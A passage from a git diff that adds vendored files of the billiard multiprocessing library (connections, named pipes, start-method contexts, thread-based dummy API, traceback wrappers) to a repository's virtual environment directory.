1, obsize, ibsize, _winapi.NMPWAIT_WAIT_FOREVER, + # default security descriptor: the handle cannot be inherited + _winapi.NULL + ) + h2 = _winapi.CreateFile( + address, access, 0, _winapi.NULL, _winapi.OPEN_EXISTING, + _winapi.FILE_FLAG_OVERLAPPED, _winapi.NULL + ) + _winapi.SetNamedPipeHandleState( + h2, _winapi.PIPE_READMODE_MESSAGE, None, None + ) + + overlapped = _winapi.ConnectNamedPipe(h1, overlapped=True) + _, err = overlapped.GetOverlappedResult(True) + assert err == 0 + + c1 = PipeConnection(h1, writable=duplex) + c2 = PipeConnection(h2, readable=duplex) + + return c1, c2 + +# +# Definitions for connections based on sockets +# + + +class SocketListener: + ''' + Representation of a socket which is bound to an address and listening + ''' + def __init__(self, address, family, backlog=1): + self._socket = socket.socket(getattr(socket, family)) + try: + # SO_REUSEADDR has different semantics on Windows (issue #2550). + if os.name == 'posix': + self._socket.setsockopt(socket.SOL_SOCKET, + socket.SO_REUSEADDR, 1) + self._socket.setblocking(True) + self._socket.bind(address) + self._socket.listen(backlog) + self._address = self._socket.getsockname() + except OSError: + self._socket.close() + raise + self._family = family + self._last_accepted = None + + if family == 'AF_UNIX': + self._unlink = util.Finalize( + self, os.unlink, args=(address,), exitpriority=0 + ) + else: + self._unlink = None + + def accept(self): + while True: + try: + s, self._last_accepted = self._socket.accept() + except (OSError, IOError, socket.error) as exc: + if getattr(exc, 'errno', None) != errno.EINTR: + raise + else: + break + s.setblocking(True) + return Connection(detach(s)) + + def close(self): + try: + self._socket.close() + finally: + unlink = self._unlink + if unlink is not None: + self._unlink = None + unlink() + + +def SocketClient(address): + ''' + Return a connection object connected to the socket given by `address` + ''' + family = address_type(address) + s = socket.socket(getattr(socket, family)) + s.setblocking(True) + s.connect(address) + return Connection(detach(s)) + +# +# Definitions for connections based on named pipes +# + +if sys.platform == 'win32': + + class PipeListener: + ''' + Representation of a named pipe + ''' + def __init__(self, address, backlog=None): + self._address = address + self._handle_queue = [self._new_handle(first=True)] + + self._last_accepted = None + util.sub_debug('listener created with address=%r', self._address) + self.close = util.Finalize( + self, PipeListener._finalize_pipe_listener, + args=(self._handle_queue, self._address), exitpriority=0 + ) + + def _new_handle(self, first=False): + flags = _winapi.PIPE_ACCESS_DUPLEX | _winapi.FILE_FLAG_OVERLAPPED + if first: + flags |= _winapi.FILE_FLAG_FIRST_PIPE_INSTANCE + return _winapi.CreateNamedPipe( + self._address, flags, + _winapi.PIPE_TYPE_MESSAGE | _winapi.PIPE_READMODE_MESSAGE | + _winapi.PIPE_WAIT, + _winapi.PIPE_UNLIMITED_INSTANCES, BUFSIZE, BUFSIZE, + _winapi.NMPWAIT_WAIT_FOREVER, _winapi.NULL + ) + + def accept(self): + self._handle_queue.append(self._new_handle()) + handle = self._handle_queue.pop(0) + try: + ov = _winapi.ConnectNamedPipe(handle, overlapped=True) + except OSError as e: + if e.winerror != _winapi.ERROR_NO_DATA: + raise + # ERROR_NO_DATA can occur if a client has already connected, + # written data and then disconnected -- see Issue 14725. + else: + try: + _winapi.WaitForMultipleObjects( + [ov.event], False, INFINITE) + except: + ov.cancel() + _winapi.CloseHandle(handle) + raise + finally: + _, err = ov.GetOverlappedResult(True) + assert err == 0 + return PipeConnection(handle) + + @staticmethod + def _finalize_pipe_listener(queue, address): + util.sub_debug('closing listener with address=%r', address) + for handle in queue: + _winapi.CloseHandle(handle) + + def PipeClient(address, _ignore=(_winapi.ERROR_SEM_TIMEOUT, + _winapi.ERROR_PIPE_BUSY)): + ''' + Return a connection object connected to the pipe given by `address` + ''' + t = _init_timeout() + while 1: + try: + _winapi.WaitNamedPipe(address, 1000) + h = _winapi.CreateFile( + address, _winapi.GENERIC_READ | _winapi.GENERIC_WRITE, + 0, _winapi.NULL, _winapi.OPEN_EXISTING, + _winapi.FILE_FLAG_OVERLAPPED, _winapi.NULL + ) + except OSError as e: + if e.winerror not in _ignore or _check_timeout(t): + raise + else: + break + else: + raise + + _winapi.SetNamedPipeHandleState( + h, _winapi.PIPE_READMODE_MESSAGE, None, None + ) + return PipeConnection(h) + +# +# Authentication stuff +# + +MESSAGE_LENGTH = 20 + +CHALLENGE = b'#CHALLENGE#' +WELCOME = b'#WELCOME#' +FAILURE = b'#FAILURE#' + + +def deliver_challenge(connection, authkey): + import hmac + assert isinstance(authkey, bytes) + message = os.urandom(MESSAGE_LENGTH) + connection.send_bytes(CHALLENGE + message) + digest = hmac.new(authkey, message, 'md5').digest() + response = connection.recv_bytes(256) # reject large message + if response == digest: + connection.send_bytes(WELCOME) + else: + connection.send_bytes(FAILURE) + raise AuthenticationError('digest received was wrong') + + +def answer_challenge(connection, authkey): + import hmac + assert isinstance(authkey, bytes) + message = connection.recv_bytes(256) # reject large message + assert message[:len(CHALLENGE)] == CHALLENGE, 'message = %r' % message + message = message[len(CHALLENGE):] + digest = hmac.new(authkey, message, 'md5').digest() + connection.send_bytes(digest) + response = connection.recv_bytes(256) # reject large message + if response != WELCOME: + raise AuthenticationError('digest sent was rejected') + +# +# Support for using xmlrpclib for serialization +# + + +class ConnectionWrapper: + + def __init__(self, conn, dumps, loads): + self._conn = conn + self._dumps = dumps + self._loads = loads + for attr in ('fileno', 'close', 'poll', 'recv_bytes', 'send_bytes'): + obj = getattr(conn, attr) + setattr(self, attr, obj) + + def send(self, obj): + s = self._dumps(obj) + self._conn.send_bytes(s) + + def recv(self): + s = self._conn.recv_bytes() + return self._loads(s) + + +def _xml_dumps(obj): + o = xmlrpclib.dumps((obj, ), None, None, None, 1) # noqa + return o.encode('utf-8') + + +def _xml_loads(s): + (obj,), method = xmlrpclib.loads(s.decode('utf-8')) # noqa + return obj + + +class XmlListener(Listener): + + def accept(self): + global xmlrpclib + import xmlrpc.client as xmlrpclib # noqa + obj = Listener.accept(self) + return ConnectionWrapper(obj, _xml_dumps, _xml_loads) + + +def XmlClient(*args, **kwds): + global xmlrpclib + import xmlrpc.client as xmlrpclib # noqa + return ConnectionWrapper(Client(*args, **kwds), _xml_dumps, _xml_loads) + +# +# Wait +# + +if sys.platform == 'win32': + + def _exhaustive_wait(handles, timeout): + # Return ALL handles which are currently signaled. (Only + # returning the first signaled might create starvation issues.) + L = list(handles) + ready = [] + while L: + res = _winapi.WaitForMultipleObjects(L, False, timeout) + if res == WAIT_TIMEOUT: + break + elif WAIT_OBJECT_0 <= res < WAIT_OBJECT_0 + len(L): + res -= WAIT_OBJECT_0 + elif WAIT_ABANDONED_0 <= res < WAIT_ABANDONED_0 + len(L): + res -= WAIT_ABANDONED_0 + else: + raise RuntimeError('Should not get here') + ready.append(L[res]) + L = L[res + 1:] + timeout = 0 + return ready + + _ready_errors = {_winapi.ERROR_BROKEN_PIPE, _winapi.ERROR_NETNAME_DELETED} + + def wait(object_list, timeout=None): + ''' + Wait till an object in object_list is ready/readable. + + Returns list of those objects in object_list which are ready/readable. + ''' + if timeout is None: + timeout = INFINITE + elif timeout < 0: + timeout = 0 + else: + timeout = int(timeout * 1000 + 0.5) + + object_list = list(object_list) + waithandle_to_obj = {} + ov_list = [] + ready_objects = set() + ready_handles = set() + + try: + for o in object_list: + try: + fileno = getattr(o, 'fileno') + except AttributeError: + waithandle_to_obj[o.__index__()] = o + else: + # start an overlapped read of length zero + try: + ov, err = _winapi.ReadFile(fileno(), 0, True) + except OSError as e: + err = e.winerror + if err not in _ready_errors: + raise + if err == _winapi.ERROR_IO_PENDING: + ov_list.append(ov) + waithandle_to_obj[ov.event] = o + else: + # If o.fileno() is an overlapped pipe handle and + # err == 0 then there is a zero length message + # in the pipe, but it HAS NOT been consumed. + ready_objects.add(o) + timeout = 0 + + ready_handles = _exhaustive_wait(waithandle_to_obj.keys(), timeout) + finally: + # request that overlapped reads stop + for ov in ov_list: + ov.cancel() + + # wait for all overlapped reads to stop + for ov in ov_list: + try: + _, err = ov.GetOverlappedResult(True) + except OSError as e: + err = e.winerror + if err not in _ready_errors: + raise + if err != _winapi.ERROR_OPERATION_ABORTED: + o = waithandle_to_obj[ov.event] + ready_objects.add(o) + if err == 0: + # If o.fileno() is an overlapped pipe handle then + # a zero length message HAS been consumed. + if hasattr(o, '_got_empty_message'): + o._got_empty_message = True + + ready_objects.update(waithandle_to_obj[h] for h in ready_handles) + return [p for p in object_list if p in ready_objects] + +else: + + if hasattr(select, 'poll'): + def _poll(fds, timeout): + if timeout is not None: + timeout = int(timeout * 1000) # timeout is in milliseconds + fd_map = {} + pollster = select.poll() + for fd in fds: + pollster.register(fd, select.POLLIN) + if hasattr(fd, 'fileno'): + fd_map[fd.fileno()] = fd + else: + fd_map[fd] = fd + ls = [] + for fd, event in pollster.poll(timeout): + if event & select.POLLNVAL: + raise ValueError('invalid file descriptor %i' % fd) + ls.append(fd_map[fd]) + return ls + else: + def _poll(fds, timeout): # noqa + return select.select(fds, [], [], timeout)[0] + + def wait(object_list, timeout=None): # noqa + ''' + Wait till an object in object_list is ready/readable. + + Returns list of those objects in object_list which are ready/readable. + ''' + if timeout is not None: + if timeout <= 0: + return _poll(object_list, 0) + else: + deadline = monotonic() + timeout + while True: + try: + return _poll(object_list, timeout) + except (OSError, IOError, socket.error) as e: + if e.errno != errno.EINTR: + raise + if timeout is not None: + timeout = deadline - monotonic() + +# +# Make connection and socket objects shareable if possible +# + +if sys.platform == 'win32': + def reduce_connection(conn): + handle = conn.fileno() + with socket.fromfd(handle, socket.AF_INET, socket.SOCK_STREAM) as s: + from . import resource_sharer + ds = resource_sharer.DupSocket(s) + return rebuild_connection, (ds, conn.readable, conn.writable) + + def rebuild_connection(ds, readable, writable): + sock = ds.detach() + return Connection(detach(sock), readable, writable) + reduction.register(Connection, reduce_connection) + + def reduce_pipe_connection(conn): + access = ((_winapi.FILE_GENERIC_READ if conn.readable else 0) | + (_winapi.FILE_GENERIC_WRITE if conn.writable else 0)) + dh = reduction.DupHandle(conn.fileno(), access) + return rebuild_pipe_connection, (dh, conn.readable, conn.writable) + + def rebuild_pipe_connection(dh, readable, writable): + return PipeConnection(detach(dh), readable, writable) + reduction.register(PipeConnection, reduce_pipe_connection) + +else: + def reduce_connection(conn): + df = reduction.DupFd(conn.fileno()) + return rebuild_connection, (df, conn.readable, conn.writable) + + def rebuild_connection(df, readable, writable): + return Connection(detach(df), readable, writable) + reduction.register(Connection, reduce_connection) diff --git a/env/Lib/site-packages/billiard/context.py b/env/Lib/site-packages/billiard/context.py new file mode 100644 index 00000000..5bbc8352 --- /dev/null +++ b/env/Lib/site-packages/billiard/context.py @@ -0,0 +1,420 @@ +import os +import sys +import threading +import warnings + +from . import process + +__all__ = [] # things are copied from here to __init__.py + + +W_NO_EXECV = """\ +force_execv is not supported as the billiard C extension \ +is not installed\ +""" + + +# +# Exceptions +# + +from .exceptions import ( # noqa + ProcessError, + BufferTooShort, + TimeoutError, + AuthenticationError, + TimeLimitExceeded, + SoftTimeLimitExceeded, + WorkerLostError, +) + + +# +# Base type for contexts +# + +class BaseContext: + + ProcessError = ProcessError + BufferTooShort = BufferTooShort + TimeoutError = TimeoutError + AuthenticationError = AuthenticationError + TimeLimitExceeded = TimeLimitExceeded + SoftTimeLimitExceeded = SoftTimeLimitExceeded + WorkerLostError = WorkerLostError + + current_process = staticmethod(process.current_process) + active_children = staticmethod(process.active_children) + + if hasattr(os, 'cpu_count'): + def cpu_count(self): + '''Returns the number of CPUs in the system''' + num = os.cpu_count() + if num is None: + raise NotImplementedError('cannot determine number of cpus') + else: + return num + else: + def cpu_count(self): # noqa + if sys.platform == 'win32': + try: + num = int(os.environ['NUMBER_OF_PROCESSORS']) + except (ValueError, KeyError): + num = 0 + elif 'bsd' in sys.platform or sys.platform == 'darwin': + comm = '/sbin/sysctl -n hw.ncpu' + if sys.platform == 'darwin': + comm = '/usr' + comm + try: + with os.popen(comm) as p: + num = int(p.read()) + except ValueError: + num = 0 + else: + try: + num = os.sysconf('SC_NPROCESSORS_ONLN') + except (ValueError, OSError, AttributeError): + num = 0 + + if num >= 1: + return num + else: + raise NotImplementedError('cannot determine number of cpus') + + def Manager(self): + '''Returns a manager associated with a running server process + + The managers methods such as `Lock()`, `Condition()` and `Queue()` + can be used to create shared objects. + ''' + from .managers import SyncManager + m = SyncManager(ctx=self.get_context()) + m.start() + return m + + def Pipe(self, duplex=True, rnonblock=False, wnonblock=False): + '''Returns two connection object connected by a pipe''' + from .connection import Pipe + return Pipe(duplex, rnonblock, wnonblock) + + def Lock(self): + '''Returns a non-recursive lock object''' + from .synchronize import Lock + return Lock(ctx=self.get_context()) + + def RLock(self): + '''Returns a recursive lock object''' + from .synchronize import RLock + return RLock(ctx=self.get_context()) + + def Condition(self, lock=None): + '''Returns a condition object''' + from .synchronize import Condition + return Condition(lock, ctx=self.get_context()) + + def Semaphore(self, value=1): + '''Returns a semaphore object''' + from .synchronize import Semaphore + return Semaphore(value, ctx=self.get_context()) + + def BoundedSemaphore(self, value=1): + '''Returns a bounded semaphore object''' + from .synchronize import BoundedSemaphore + return BoundedSemaphore(value, ctx=self.get_context()) + + def Event(self): + '''Returns an event object''' + from .synchronize import Event + return Event(ctx=self.get_context()) + + def Barrier(self, parties, action=None, timeout=None): + '''Returns a barrier object''' + from .synchronize import Barrier + return Barrier(parties, action, timeout, ctx=self.get_context()) + + def Queue(self, maxsize=0): + '''Returns a queue object''' + from .queues import Queue + return Queue(maxsize, ctx=self.get_context()) + + def JoinableQueue(self, maxsize=0): + '''Returns a queue object''' + from .queues import JoinableQueue + return JoinableQueue(maxsize, ctx=self.get_context()) + + def SimpleQueue(self): + '''Returns a queue object''' + from .queues import SimpleQueue + return SimpleQueue(ctx=self.get_context()) + + def Pool(self, processes=None, initializer=None, initargs=(), + maxtasksperchild=None, timeout=None, soft_timeout=None, + lost_worker_timeout=None, max_restarts=None, + max_restart_freq=1, on_process_up=None, on_process_down=None, + on_timeout_set=None, on_timeout_cancel=None, threads=True, + semaphore=None, putlocks=False, allow_restart=False): + '''Returns a process pool object''' + from .pool import Pool + return Pool(processes, initializer, initargs, maxtasksperchild, + timeout, soft_timeout, lost_worker_timeout, + max_restarts, max_restart_freq, on_process_up, + on_process_down, on_timeout_set, on_timeout_cancel, + threads, semaphore, putlocks, allow_restart, + context=self.get_context()) + + def RawValue(self, typecode_or_type, *args): + '''Returns a shared object''' + from .sharedctypes import RawValue + return RawValue(typecode_or_type, *args) + + def RawArray(self, typecode_or_type, size_or_initializer): + '''Returns a shared array''' + from .sharedctypes import RawArray + return RawArray(typecode_or_type, size_or_initializer) + + def Value(self, typecode_or_type, *args, **kwargs): + '''Returns a synchronized shared object''' + from .sharedctypes import Value + lock = kwargs.get('lock', True) + return Value(typecode_or_type, *args, lock=lock, + ctx=self.get_context()) + + def Array(self, typecode_or_type, size_or_initializer, *args, **kwargs): + '''Returns a synchronized shared array''' + from .sharedctypes import Array + lock = kwargs.get('lock', True) + return Array(typecode_or_type, size_or_initializer, lock=lock, + ctx=self.get_context()) + + def freeze_support(self): + '''Check whether this is a fake forked process in a frozen executable. + If so then run code specified by commandline and exit. + ''' + if sys.platform == 'win32' and getattr(sys, 'frozen', False): + from .spawn import freeze_support + freeze_support() + + def get_logger(self): + '''Return package logger -- if it does not already exist then + it is created. + ''' + from .util import get_logger + return get_logger() + + def log_to_stderr(self, level=None): + '''Turn on logging and add a handler which prints to stderr''' + from .util import log_to_stderr + return log_to_stderr(level) + + def allow_connection_pickling(self): + '''Install support for sending connections and sockets + between processes + ''' + # This is undocumented. In previous versions of multiprocessing + # its only effect was to make socket objects inheritable on Windows. + from . import connection # noqa + + def set_executable(self, executable): + '''Sets the path to a python.exe or pythonw.exe binary used to run + child processes instead of sys.executable when using the 'spawn' + start method. Useful for people embedding Python. + ''' + from .spawn import set_executable + set_executable(executable) + + def set_forkserver_preload(self, module_names): + '''Set list of module names to try to load in forkserver process. + This is really just a hint. + ''' + from .forkserver import set_forkserver_preload + set_forkserver_preload(module_names) + + def get_context(self, method=None): + if method is None: + return self + try: + ctx = _concrete_contexts[method] + except KeyError: + raise ValueError('cannot find context for %r' % method) + ctx._check_available() + return ctx + + def get_start_method(self, allow_none=False): + return self._name + + def set_start_method(self, method=None): + raise ValueError('cannot set start method of concrete context') + + def forking_is_enabled(self): + # XXX for compatibility with billiard <3.4 + return (self.get_start_method() or 'fork') == 'fork' + + def forking_enable(self, value): + # XXX for compatibility with billiard <3.4 + if not value: + from ._ext import supports_exec + if supports_exec: + self.set_start_method('spawn', force=True) + else: + warnings.warn(RuntimeWarning(W_NO_EXECV)) + + def _check_available(self): + pass + +# +# Type of default context -- underlying context can be set at most once +# + + +class Process(process.BaseProcess): + _start_method = None + + @staticmethod + def _Popen(process_obj): + return _default_context.get_context().Process._Popen(process_obj) + + +class DefaultContext(BaseContext): + Process = Process + + def __init__(self, context): + self._default_context = context + self._actual_context = None + + def get_context(self, method=None): + if method is None: + if self._actual_context is None: + self._actual_context = self._default_context + return self._actual_context + else: + return super(DefaultContext, self).get_context(method) + + def set_start_method(self, method, force=False): + if self._actual_context is not None and not force: + raise RuntimeError('context has already been set') + if method is None and force: + self._actual_context = None + return + self._actual_context = self.get_context(method) + + def get_start_method(self, allow_none=False): + if self._actual_context is None: + if allow_none: + return None + self._actual_context = self._default_context + return self._actual_context._name + + def get_all_start_methods(self): + if sys.platform == 'win32': + return ['spawn'] + else: + from . import reduction + if reduction.HAVE_SEND_HANDLE: + return ['fork', 'spawn', 'forkserver'] + else: + return ['fork', 'spawn'] + +DefaultContext.__all__ = list(x for x in dir(DefaultContext) if x[0] != '_') + +# +# Context types for fixed start method +# + +if sys.platform != 'win32': + + class ForkProcess(process.BaseProcess): + _start_method = 'fork' + + @staticmethod + def _Popen(process_obj): + from .popen_fork import Popen + return Popen(process_obj) + + class SpawnProcess(process.BaseProcess): + _start_method = 'spawn' + + @staticmethod + def _Popen(process_obj): + from .popen_spawn_posix import Popen + return Popen(process_obj) + + class ForkServerProcess(process.BaseProcess): + _start_method = 'forkserver' + + @staticmethod + def _Popen(process_obj): + from .popen_forkserver import Popen + return Popen(process_obj) + + class ForkContext(BaseContext): + _name = 'fork' + Process = ForkProcess + + class SpawnContext(BaseContext): + _name = 'spawn' + Process = SpawnProcess + + class ForkServerContext(BaseContext): + _name = 'forkserver' + Process = ForkServerProcess + + def _check_available(self): + from . import reduction + if not reduction.HAVE_SEND_HANDLE: + raise ValueError('forkserver start method not available') + + _concrete_contexts = { + 'fork': ForkContext(), + 'spawn': SpawnContext(), + 'forkserver': ForkServerContext(), + } + _default_context = DefaultContext(_concrete_contexts['fork']) + +else: + + class SpawnProcess(process.BaseProcess): + _start_method = 'spawn' + + @staticmethod + def _Popen(process_obj): + from .popen_spawn_win32 import Popen + return Popen(process_obj) + + class SpawnContext(BaseContext): + _name = 'spawn' + Process = SpawnProcess + + _concrete_contexts = { + 'spawn': SpawnContext(), + } + _default_context = DefaultContext(_concrete_contexts['spawn']) + +# +# Force the start method +# + + +def _force_start_method(method): + _default_context._actual_context = _concrete_contexts[method] + +# +# Check that the current thread is spawning a child process +# + +_tls = threading.local() + + +def get_spawning_popen(): + return getattr(_tls, 'spawning_popen', None) + + +def set_spawning_popen(popen): + _tls.spawning_popen = popen + + +def assert_spawning(obj): + if get_spawning_popen() is None: + raise RuntimeError( + '%s objects should only be shared between processes' + ' through inheritance' % type(obj).__name__ + ) diff --git a/env/Lib/site-packages/billiard/dummy/__init__.py b/env/Lib/site-packages/billiard/dummy/__init__.py new file mode 100644 index 00000000..1ba3e90d --- /dev/null +++ b/env/Lib/site-packages/billiard/dummy/__init__.py @@ -0,0 +1,166 @@ +# +# Support for the API of the multiprocessing package using threads +# +# multiprocessing/dummy/__init__.py +# +# Copyright (c) 2006-2008, R Oudkerk +# All rights reserved. +# +# Redistribution and use in source and binary forms, with or without +# modification, are permitted provided that the following conditions +# are met: +# +# 1. Redistributions of source code must retain the above copyright +# notice, this list of conditions and the following disclaimer. +# 2. Redistributions in binary form must reproduce the above copyright +# notice, this list of conditions and the following disclaimer in the +# documentation and/or other materials provided with the distribution. +# 3. Neither the name of author nor the names of any contributors may be +# used to endorse or promote products derived from this software +# without specific prior written permission. +# +# THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS "AS IS" AND +# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE +# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE +# ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE +# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL +# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS +# OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) +# HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT +# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY +# OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF +# SUCH DAMAGE. +# + +# +# Imports +# + +import threading +import sys +import weakref +import array + +from threading import Lock, RLock, Semaphore, BoundedSemaphore +from threading import Event + +from queue import Queue + +from billiard.connection import Pipe + +__all__ = [ + 'Process', 'current_process', 'active_children', 'freeze_support', + 'Lock', 'RLock', 'Semaphore', 'BoundedSemaphore', 'Condition', + 'Event', 'Queue', 'Manager', 'Pipe', 'Pool', 'JoinableQueue' +] + + +class DummyProcess(threading.Thread): + + def __init__(self, group=None, target=None, name=None, args=(), kwargs={}): + threading.Thread.__init__(self, group, target, name, args, kwargs) + self._pid = None + self._children = weakref.WeakKeyDictionary() + self._start_called = False + self._parent = current_process() + + def start(self): + assert self._parent is current_process() + self._start_called = True + if hasattr(self._parent, '_children'): + self._parent._children[self] = None + threading.Thread.start(self) + + @property + def exitcode(self): + if self._start_called and not self.is_alive(): + return 0 + else: + return None + + +try: + _Condition = threading._Condition +except AttributeError: # Py3 + _Condition = threading.Condition # noqa + + +class Condition(_Condition): + if sys.version_info[0] == 3: + notify_all = _Condition.notifyAll + else: + notify_all = _Condition.notifyAll.__func__ + + +Process = DummyProcess +current_process = threading.current_thread +current_process()._children = weakref.WeakKeyDictionary() + + +def active_children(): + children = current_process()._children + for p in list(children): + if not p.is_alive(): + children.pop(p, None) + return list(children) + + +def freeze_support(): + pass + + +class Namespace(object): + + def __init__(self, **kwds): + self.__dict__.update(kwds) + + def __repr__(self): + items = list(self.__dict__.items()) + temp = [] + for name, value in items: + if not name.startswith('_'): + temp.append('%s=%r' % (name, value)) + temp.sort() + return '%s(%s)' % (self.__class__.__name__, str.join(', ', temp)) + + +dict = dict +list = list + + +def Array(typecode, sequence, lock=True): + return array.array(typecode, sequence) + + +class Value(object): + + def __init__(self, typecode, value, lock=True): + self._typecode = typecode + self._value = value + + def _get(self): + return self._value + + def _set(self, value): + self._value = value + value = property(_get, _set) + + def __repr__(self): + return '<%r(%r, %r)>' % (type(self).__name__, + self._typecode, self._value) + + +def Manager(): + return sys.modules[__name__] + + +def shutdown(): + pass + + +def Pool(processes=None, initializer=None, initargs=()): + from billiard.pool import ThreadPool + return ThreadPool(processes, initializer, initargs) + + +JoinableQueue = Queue diff --git a/env/Lib/site-packages/billiard/dummy/connection.py b/env/Lib/site-packages/billiard/dummy/connection.py new file mode 100644 index 00000000..fe2de94f --- /dev/null +++ b/env/Lib/site-packages/billiard/dummy/connection.py @@ -0,0 +1,92 @@ +# +# Analogue of `multiprocessing.connection` which uses queues instead of sockets +# +# multiprocessing/dummy/connection.py +# +# Copyright (c) 2006-2008, R Oudkerk +# All rights reserved. +# +# Redistribution and use in source and binary forms, with or without +# modification, are permitted provided that the following conditions +# are met: +# +# 1. Redistributions of source code must retain the above copyright +# notice, this list of conditions and the following disclaimer. +# 2. Redistributions in binary form must reproduce the above copyright +# notice, this list of conditions and the following disclaimer in the +# documentation and/or other materials provided with the distribution. +# 3. Neither the name of author nor the names of any contributors may be +# used to endorse or promote products derived from this software +# without specific prior written permission. +# +# THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS "AS IS" AND +# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE +# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE +# ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE +# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL +# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS +# OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) +# HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT +# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY +# OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF +# SUCH DAMAGE. +# + +from queue import Queue + +__all__ = ['Client', 'Listener', 'Pipe'] + +families = [None] + + +class Listener(object): + + def __init__(self, address=None, family=None, backlog=1): + self._backlog_queue = Queue(backlog) + + def accept(self): + return Connection(*self._backlog_queue.get()) + + def close(self): + self._backlog_queue = None + + address = property(lambda self: self._backlog_queue) + + def __enter__(self): + return self + + def __exit__(self, *exc_info): + self.close() + + +def Client(address): + _in, _out = Queue(), Queue() + address.put((_out, _in)) + return Connection(_in, _out) + + +def Pipe(duplex=True): + a, b = Queue(), Queue() + return Connection(a, b), Connection(b, a) + + +class Connection(object): + + def __init__(self, _in, _out): + self._out = _out + self._in = _in + self.send = self.send_bytes = _out.put + self.recv = self.recv_bytes = _in.get + + def poll(self, timeout=0.0): + if self._in.qsize() > 0: + return True + if timeout <= 0.0: + return False + self._in.not_empty.acquire() + self._in.not_empty.wait(timeout) + self._in.not_empty.release() + return self._in.qsize() > 0 + + def close(self): + pass diff --git a/env/Lib/site-packages/billiard/einfo.py b/env/Lib/site-packages/billiard/einfo.py new file mode 100644 index 00000000..f82c5f50 --- /dev/null +++ b/env/Lib/site-packages/billiard/einfo.py @@ -0,0 +1,167 @@ +import sys +import traceback + +__all__ = ['ExceptionInfo', 'Traceback'] + +DEFAULT_MAX_FRAMES = sys.getrecursionlimit() // 8 + + +class _Code: + + def __init__(self, code): + self.co_filename = code.co_filename + self.co_name = code.co_name + self.co_argcount = code.co_argcount + self.co_cellvars = () + self.co_firstlineno = code.co_firstlineno + self.co_flags = code.co_flags + self.co_freevars = () + self.co_code = b'' + self.co_lnotab = b'' + self.co_names = code.co_names + self.co_nlocals = code.co_nlocals + self.co_stacksize = code.co_stacksize + self.co_varnames = () + if sys.version_info >= (3, 11): + self._co_positions = list(code.co_positions()) + + if sys.version_info >= (3, 11): + @property + def co_positions(self): + return self._co_positions.__iter__ + + +class _Frame: + Code = _Code + + def __init__(self, frame): + self.f_builtins = {} + self.f_globals = { + "__file__": frame.f_globals.get("__file__", "__main__"), + "__name__": frame.f_globals.get("__name__"), + "__loader__": None, + } + self.f_locals = fl = {} + try: + fl["__traceback_hide__"] = frame.f_locals["__traceback_hide__"] + except KeyError: + pass + self.f_back = None + self.f_trace = None + self.f_exc_traceback = None + self.f_exc_type = None + self.f_exc_value = None + self.f_code = self.Code(frame.f_code) + self.f_lineno = frame.f_lineno + self.f_lasti = frame.f_lasti + # don't want to hit https://bugs.python.org/issue21967 + self.f_restricted = False + + +class _Object: + + def __init__(self, **kw): + [setattr(self, k, v) for k, v in kw.items()] + + +class _Truncated: + + def __init__(self): + self.tb_lineno = -1 + self.tb_frame = _Object( + f_globals={"__file__": "", + "__name__": "", + "__loader__": None}, + f_fileno=None, + f_code=_Object(co_filename="...", + co_name="[rest of traceback truncated]"), + ) + self.tb_next = None + self.tb_lasti = 0 + + +class Traceback: + Frame = _Frame + + def __init__(self, tb, max_frames=DEFAULT_MAX_FRAMES, depth=0): + self.tb_frame = self.Frame(tb.tb_frame) + self.tb_lineno = tb.tb_lineno + self.tb_lasti = tb.tb_lasti + self.tb_next = None + if tb.tb_next is not None: + if depth <= max_frames: + self.tb_next = Traceback(tb.tb_next, max_frames, depth + 1) + else: + self.tb_next = _Truncated() + + +class RemoteTraceback(Exception): + def __init__(self, tb): + self.tb = tb + + def __str__(self): + return self.tb + + +class ExceptionWithTraceback(Exception): + def __init__(self, exc, tb): + self.exc = exc + self.tb = '\n"""\n%s"""' % tb + super().__init__() + + def __str__(self): + return self.tb + + def __reduce__(self): + return rebuild_exc, (self.exc, self.tb) + + +def rebuild_exc(exc, tb): + exc.__cause__ = RemoteTraceback(tb) + return exc + + +class ExceptionInfo: + """Exception wrapping an exception and its traceback. + + :param exc_info: The exception info tuple as returned by + :func:`sys.exc_info`. + + """ + + #: Exception type. + type = None + + #: Exception instance. + exception = None + + #: Pickleable traceback instance for use with :mod:`traceback` + tb = None + + #: String representation of the traceback. + traceback = None + + #: Set to true if this is an internal error. + internal = False + + def __init__(self, exc_info=None, internal=False): + self.type, exception, tb = exc_info or sys.exc_info() + try: + self.tb = Traceback(tb) + self.traceback = ''.join( + traceback.format_exception(self.type, exception, tb), + ) + self.internal = internal + finally: + del tb + self.exception = ExceptionWithTraceback(exception, self.traceback) + + def __str__(self): + return self.traceback + + def __repr__(self): + return "<%s: %r>" % (self.__class__.__name__, self.exception, ) + + @property + def exc_info(self): + return self.type, self.exception, self.tb diff --git a/env/Lib/site-packages/billiard/exceptions.py 